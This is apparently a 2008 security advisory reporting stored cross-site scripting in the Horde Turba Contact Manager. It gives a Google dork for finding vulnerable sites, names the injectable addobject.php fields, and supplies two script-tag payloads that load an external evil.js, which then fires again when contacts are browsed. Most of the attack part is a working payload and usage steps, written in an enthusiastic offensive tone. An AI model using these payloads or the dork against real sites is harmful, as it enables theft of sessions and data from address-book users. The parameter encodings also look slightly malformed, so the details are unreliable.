+==========================================================================+
+          Horde & Turba Contact Manager   & XSS Vulnerabilities           +
+==========================================================================+


Author(s): Ivan Sanchez 

Product: Turba Contact Manager

Web: http://www.horde.org

Versions: Horde & Turba Contact Manager 

Date: 13/05/2008


Turba is the Horde contact management application. It is a production level
address book, and makes heavy use of the Horde framework to provide integration 
with IMP and other Horde applications.



GOOGLE DORKS:
------------

inurl:"addobject.php?"


Evil Function:  
--------------

http://www.site/horde2/turba/addobject.php?

Advanced Search / then inside the form, put evil code:(name/e-mail)form-


Internal Variables:
-------------------

object%5Bemail5D
object%5Btitle5D


First EXPLOIT:
--------------

Insert evil code into these variables,then run the exploit !!!

1-object%5Bemail5D= "><script src=http://site/scripts/evil.js></script>
2-object%5Btitle5D= "><script src=http://site/scripts/evil.js></script>



Second EXPLOIT:
--------------

then if you see your contacts adresses, you will see a lot of insane code XSS there.
If you click on them,exploit again !!!!


http://www.site/horde2/turba/browse.php

Exploit again the evil script!!!!



   NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+       Horde & Turba Contact Manager  &  XSS Vulnerabilities              +
+==========================================================================+